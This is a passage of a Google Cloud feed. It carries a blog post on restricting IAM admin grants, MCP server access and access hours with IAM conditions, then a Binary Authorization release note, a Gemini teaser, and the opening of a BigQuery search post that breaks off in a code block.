    <id>https://cloud.google.com/blog/topics/developers-practitioners/generosity-under-conditions-hardening-google-cloud-access-management</id>
    <title>Generosity Under Conditions: Hardening Google Cloud Access Management</title>
    <updated>2026-07-21T11:19:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In Google Cloud, Identity and Access Management (IAM) helps you maintain access control over your cloud resources and operations. While it includes other features, this is its primary purpose. If you ever tried to harden security over your application, you know the importance of the &lt;/span&gt;&lt;a href="https://en.wikipedia.org/wiki/Principle_of_least_privilege" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Principle of Least Privilege&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; (&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;PoLP&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;) ‒ grant the absolute minimum permissions to your users and workloads to allow them to perform their tasks. You reach it through use of &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/iam/docs/roles-permissions"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;predefined roles&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and custom roles and setting up a combination of &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Allow&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Deny&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; IAM policies at project, folder, or organization level. Using a combination of Allow and Deny policies along the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/iam/docs/allow-policies#inheritance"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;resource hierarchy&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; is an effective way to control access. This approach lets you enforce PoLP across many different scenarios.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;The existing flexible control can be insufficient when resources in the project are shared between multiple workloads or used by more than one team. In many such scenarios, it is possible to bind IAM policies to a specific resource in the project. For example, consider the difference between granting the role Artifact Registry Editor (&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;roles/artifactregistry.editor&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;) on a project vs. granting it on a specific repository in the project. In the former case, the access is granted to &lt;/span&gt;&lt;span style="font-style: italic; text-decoration: underline; vertical-align: baseline;"&gt;ANY&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; repository in the project. In the latter case, users will have the editor access only to a specific repository. However, binding IAM policies to a resource or service level isn't always possible. This is when it is time to use &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/iam/docs/conditions-overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;IAM conditions&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. Let’s look at two distinct examples that demonstrate the power of conditions when hardening access management: one for traditional administrative roles, and one for modern AI integrations.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;Use Case 1: Constraining the Power of Admins&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This case demonstrates how to restrict the specific operations that broad IAM roles are authorized to perform. You can easily scope administrative privileges for managing specific resources in a project by granting a "resource creator" role at the project level and an editor role on a selected resource. It is far more challenging to constrain IAM Admin Roles that are intended to grant access to operations rather than specific resources. A representative example would be the IAM Admin role (&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;roles/iam.admin&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;). Users granted this role can grant themselves any other role or create a new one. It greatly exceeds practical needs. The first step is to narrow the access by using the Project IAM Admin role (&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;roles/resourcemanager.projectIamAdmin&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;) that provides administrative privileges only at the level of the project.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;It is possible, however, to restrict the granted privileges even further. For example, suppose you grant the Project IAM Admin role to your builder service account that creates resources and deploys workloads. The workloads only need access to the BigQuery and Agent Platform APIs (formerly Vertex APIs) and permission to write logs and traces. For such a case you can use the following gcloud CLI command or its alternative in Terraform:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;gcloud projects add-iam-policy-binding &amp;quot;${PROJECT_ID}&amp;quot; \\\r\n    --member=&amp;quot;serviceAccount:${SA_MAIL}&amp;quot; \\\r\n    --role=&amp;quot;roles/resourcemanager.projectIamAdmin&amp;quot; \\\r\n    --condition=&amp;quot;^:^\\\r\ntitle=LimitedIAMAdmin:\\\r\nexpression=api.getAttribute(\&amp;#x27;iam.googleapis.com/modifiedGrantsByRole\&amp;#x27;, [])\\\r\n.hasOnly([\\\r\n\&amp;#x27;roles/aiplatform.user\&amp;#x27;,\\\r\n\&amp;#x27;roles/bigquery.jobUser\&amp;#x27;,\\\r\n\&amp;#x27;roles/bigquery.dataViewer\&amp;#x27;,\\\r\n\&amp;#x27;roles/cloudtrace.agent\&amp;#x27;,\\\r\n\&amp;#x27;roles/logging.logWriter\&amp;#x27;\\\r\n])&amp;quot;&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f0cdf1bc340&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The value of the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;condition&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; parameter is defined using &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Common Expression Language&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; (&lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;CEL&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;) &lt;/span&gt;&lt;a href="https://github.com/cel-expr/cel-spec/blob/master/doc/langdef.md" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;syntax&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. First it customizes a field delimiter to be a colon instead of a comma and then describes the condition fields &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;title&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;expression&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;. The &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;expression&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; field uses &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/iam/docs/conditions-attribute-reference#api-functions"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;functions for API attributes&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to identify which roles are being granted to allow granting only the roles in the comma delimited list. The same operation in Terraform will look very similar. Using input variables instead of environment variables, it will look like this:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;resource &amp;quot;google_project_iam_member&amp;quot; &amp;quot;limited_project_iam_admin&amp;quot; {\r\n  project = var.project_id\r\n  role    = &amp;quot;roles/resourcemanager.projectIamAdmin&amp;quot;\r\n  member  = &amp;quot;serviceAccount:${var.sa_email}&amp;quot;\r\n  condition {\r\n    title       = &amp;quot;LimitedIAMAdmin&amp;quot;\r\n    expression  = &amp;lt;&amp;lt;-EOT\r\n      api.getAttribute(\&amp;#x27;iam.googleapis.com/modifiedGrantsByRole\&amp;#x27;, []).hasOnly([\r\n        \&amp;#x27;roles/aiplatform.user\&amp;#x27;,\r\n        \&amp;#x27;roles/bigquery.jobUser\&amp;#x27;,\r\n        \&amp;#x27;roles/bigquery.dataViewer\&amp;#x27;,\r\n        \&amp;#x27;roles/cloudtrace.agent\&amp;#x27;,\r\n        \&amp;#x27;roles/logging.logWriter\&amp;#x27;\r\n      ])\r\n    EOT\r\n  }\r\n}&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f0cdf1bc820&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;Use Case 2: Control over MCP Server Access&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This case is about hardening access to specific services behind a single set of permissions.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Google exposes access to a subset of cloud resources and services via &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/mcp/overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;MCP Servers&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; that expose Model Context Protocol (MCP) endpoints. The access to these servers is granted using the predefined MCP Tool User (&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;roles/mcp.toolUser&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;) role. This role grants access to &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;ALL&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; available MCP servers (for a project where an IAM policy is set). Using conditions helps to narrow the access to a specific MCP server.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;gcloud projects add-iam-policy-binding $PROJECT_ID \\\r\n    --member=&amp;quot;serviceAccount:$SA_EMAIL&amp;quot; \\\r\n    --role=&amp;quot;roles/mcp.toolUser&amp;quot; \\\r\n    --condition=&amp;quot;^:^\\\r\ntitle=bigquery_mcp_server_only:\\\r\nexpression=resource.service == \&amp;#x27;bigquery.googleapis.com\&amp;#x27;&amp;quot;&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f0cdf1bc040&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Notice that the value compared to the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;resource.service&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; attribute is not the MCP server endpoint (which is &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;bigquery.googleapis.com/mcp&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;) but the endpoint of the service. It is possible to narrow the access scope further to the level of the specific MCP tools. For this you will need to use API attributes again. The following expression limits the service account access to the level of only two BigQuery MCP tools.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;quot;expression=api.getAttribute(&amp;#x27;mcp.googleapis.com/tool.name&amp;#x27;, &amp;#x27;&amp;#x27;) in [\\\r\n&amp;#x27;mcp_bigquery-mcp_execute_sql&amp;#x27;,\\\r\n&amp;#x27;mcp_bigquery-mcp_execute_sql_readonly&amp;#x27;\\\r\n]&amp;quot;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f0cdf1bc550&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Note that if you condition the IAM policy binding at the MCP tool level, you don't need to validate the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;resource.service&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; attribute.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For experimenting with MCP server access you can use the &lt;/span&gt;&lt;a href="https://codelabs.developers.google.com/getting-started-google-mcp-servers#0" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Getting Started with Google MCP Servers&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; codelab and modify its &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;gcloud projects add-iam-policy-binding&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; commands.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;And Even More&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Besides enforcing precise control when using predefined roles, IAM conditions let you craft access management based on the time of the request. For example, the following condition's expression allows access only during daytime on weekdays:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;quot;expression=request.time.getHours(&amp;#x27;Europe/Berlin&amp;#x27;) &amp;gt;= 9 &amp;amp;&amp;amp;\\\r\nrequest.time.getHours(&amp;#x27;Europe/Berlin&amp;#x27;) &amp;lt;= 17 &amp;amp;&amp;amp;\\\r\nrequest.time.getDayOfWeek(&amp;#x27;Europe/Berlin&amp;#x27;) &amp;gt;= 1 &amp;amp;&amp;amp;\\\r\nrequest.time.getDayOfWeek(&amp;#x27;Europe/Berlin&amp;#x27;) &amp;lt;= 5&amp;quot;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f0cdf1bc130&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The expression limits access from 9 o'clock in the morning to 5 o'clock in the evening according to the "Europe/Berlin" timezone from Monday to Friday (days of the week range from 0 to 6, starting with Sunday).&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;IAM conditions allow controlling the identity of the actor using the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/iam/docs/conditions-overview#principal-attributes"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;principal attributes&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. However, it can easily become an anti-pattern. The recommended practice is to control the identity of actors allowed to use the policy through the list of the IAM policy's principals instead of using the conditions.&lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;Conclusion and More Resources&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;While IAM conditions give you surgical precision over Allow policies, you can take your defense-in-depth strategy even further with &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/iam/docs/deny-overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;IAM Deny policies&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. With Deny Policies you can grant access using the predefined IAM roles with Allow policies and remove excessive permissions of the role to enforce PoLP. See the following resources for additional information about Deny policies:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Identify the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/iam/docs/deny-permissions-support"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;permissions that are supported in deny policies&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Get the format of &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/iam/docs/principal-identifiers#deny"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;principal identifiers in deny policies&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Find out how to &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/iam/docs/troubleshoot-policies"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;troubleshoot access issues with deny policies&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Learn more about &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/iam/docs/deny-overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;denying access to principals&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Read the blog post about &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/identity-security/just-say-no-build-defense-in-depth-with-iam-deny-and-org-policies"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Build defense in depth&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;You can use &lt;/span&gt;&lt;a href="https://www.skills.google/course_templates/770" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google Skills&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; for hands-on experience with IAM policies.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/topics/developers-practitioners/generosity-under-conditions-hardening-google-cloud-access-management" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-07-21T11:19:00+00:00</published>
    <media:group>
      <media:content url="https://storage.googleapis.com/gweb-cloudblog-publish/images/Generousity_Under_Conditions.max-600x600.jpg" type="image/jpeg" medium="image"/>
      <media:thumbnail url="https://storage.googleapis.com/gweb-cloudblog-publish/images/Generousity_Under_Conditions.max-600x600.jpg"/>
    </media:group>
    <link rel="enclosure" href="https://storage.googleapis.com/gweb-cloudblog-publish/images/Generousity_Under_Conditions.max-600x600.jpg" type="image/jpeg" length="0"/>
  </entry>
  <entry>
    <id>https://docs.cloud.google.com/release-notes#July_21_2026</id>
    <title>Cloud Release Notes — July 21, 2026</title>
    <updated>2026-07-21T07:00:00+00:00</updated>
    <content type="html">&lt;h2 class="release-note-product-title"&gt;Binary Authorization&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;To provide long-term security and address threats from future quantum computers,
Binary Authorization supports keys that use post-quantum cryptography (PQC)
algorithms. These algorithms, such as &lt;code&gt;ML-DSA-65&lt;/code&gt; (Dilithium3), are standardized
to be resistant to attacks from both classical and quantum computers. To learn how
to generate a PQC key pair and create an attestor, see
&lt;a href="https://docs.cloud.google.com/binary-authorization/docs/creating-attestors-cli#pqc-keys"&gt;Create post-quantum cryptography (PQC) keys&lt;/a&gt;.&lt;/p&gt;</content>
    <link href="https://docs.cloud.google.com/release-notes#July_21_2026" rel="alternate"/>
    <category term="Cloud Release Notes"/>
    <published>2026-07-21T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/products-and-platforms/products/gemini/launch-business-with-gemini</id>
    <title>5 ways to build a side hustle with Gemini</title>
    <updated>2026-07-20T19:00:00+00:00</updated>
    <content type="html">An illustration of a person sitting in a chair uploading files, and an AI sparkle icon</content>
    <link href="https://blog.google/products-and-platforms/products/gemini/launch-business-with-gemini" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-07-20T19:00:00+00:00</published>
    <media:group>
      <media:content url="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/Scale_Side_Hustles_w_Gemini_her.max-600x600.format-webp.webp" type="image/webp" medium="image"/>
      <media:thumbnail url="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/Scale_Side_Hustles_w_Gemini_her.max-600x600.format-webp.webp"/>
    </media:group>
    <link rel="enclosure" href="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/Scale_Side_Hustles_w_Gemini_her.max-600x600.format-webp.webp" type="image/webp" length="0"/>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/data-analytics/bigquery-search-innovations-unify-structured-unstructured-data</id>
    <title>Unifying Structured and Unstructured Data Insights with BQ Search Innovations</title>
    <updated>2026-07-20T18:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Modern enterprises possess a vast amount of unstructured data, yet they frequently encounter significant challenges in managing and extracting value from it. Historically, unlocking the insights hidden within PDFs, audio files, images, and unstructured text required a fragmented architecture: moving data out of your warehouse, stitching together complex LLM pipelines, and managing disparate search indexes.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;BigQuery has worked with many enterprises to make sense of their unstructured data sources. For example, consider an &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;advanced healthcare company&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;managing thousands of clinical trial documents in PDF&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; form. BigQuery helps unlock insights from these documents through a simple, five-step lifecycle: &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Access, Process, Ground, Relate, and Activate&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In this post, we are highlighting three major milestones focused heavily on the &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;"Ground"&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; phase of this framework:&lt;/span&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;General Availability (GA) of Autonomous Embedding Generation&lt;/strong&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;General Availability (GA) of AI.SEARCH with massive single-query performance gains&lt;/strong&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Public Preview of Hybrid Search&lt;/strong&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Let’s dive into how these features work together to simplify your AI architecture, using a real-world clinical trial research platform as an example.&lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;&lt;strong style="vertical-align: baseline;"&gt;Simplify Pipelines with Autonomous Embedding Generation (GA)&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Building a retrieval-augmented generation (RAG) pipeline or search application usually requires managing complex, asynchronous embedding infrastructure. You have to handle retries, error logging, and pipeline orchestration every time a new record arrives.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;With the General Availability of &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Autonomous Embedding Generation&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;, BigQuery manages this entirely for you. By simply defining a column in your schema, BigQuery asynchronously and continuously generates embeddings as new data is ingested. You have the flexibility to choose external models (like Vertex AI text-embeddings) or natively utilize &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Gemma embedding models&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; directly within BigQuery.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;How it works in practice:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Imagine you are building a research platform analyzing clinical trial PDFs stored in Google Cloud Storage. After extracting the study titles and disease areas into a table, you can automatically embed those titles:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;quot;CREATE OR REPLACE TABLE mydataset.clinical_trials\r\n(\r\n  trial_id STRING,\r\n  study_title STRING,\r\n  study_embedding STRUCT&amp;lt;result ARRAY&amp;lt;FLOAT64&amp;gt;, status STRING&amp;gt;\r\n   GENERATED ALWAYS AS (AI.EMBED(\r\n     study_title,\r\n     connection_id =&amp;gt; &amp;#x27;myconnection&amp;#x27;,\r\n     endpoint =&amp;gt; &amp;#x27;text-embedding-005&amp;#x27;\r\n   ))\r\n   STORED\r\n   OPTIONS( asynchronous = TRUE )\r\n);&amp;quot;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fdc88c3f940&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;BigQuery eliminates the need for complex third-party vector databases by managing &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;enterprise-scale processing with one configuration. This autonomous embedding generation keeps data synchronized automatically as source text changes, removing the need for manual machine learning pipelines. This integrated approach streamlines workflows for dynamic datasets and reduces the operational burden of maintaining custom data scripts.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Finally, with this GA launch, Autonomous Embedding Generation now also supports generating embeddings natively over images using &lt;/span&gt;&lt;a href="https://cloud.google.com/bigquery/docs/object-tables"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;ObjectRefs&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, unlocking true multimodal search and analytics.&lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;&lt;strong style="vertical-align: baseline;"&gt;Natural Language Search at Scale with AI.SEARCH (GA)&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To truly enable conversational analytics agents and snappier user experiences, your underlying search infrastructure needs to be intuitive and performant.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Once your data is seamlessly embedded, you need an efficient way to query it. Today, we are announcing the &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;General Availability of &lt;/strong&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/reference/standard-sql/bigqueryml-syntax-ai-search"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;AI.SEARCH()&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. This function provides a streamlined, natural-language-focused search experience, allowing you to easily find semantically related records without generating embeddings in your search path. In pairing this with the Autonomous Embedding Generation, we leverage the same embedding model used in your dataset for easier use. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Furthermore, as part of efficiency investments in the last year, we have heavily optimized AI.SEARCH for single-query execution. For online applications and single-query searches (those most common in agentic searches), we have observed &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;up to a 133x gain in slot efficiency..&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This means you can serve highly concurrent, user-facing natural language searches directly out of BigQuery faster and more cost-effectively than ever before.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
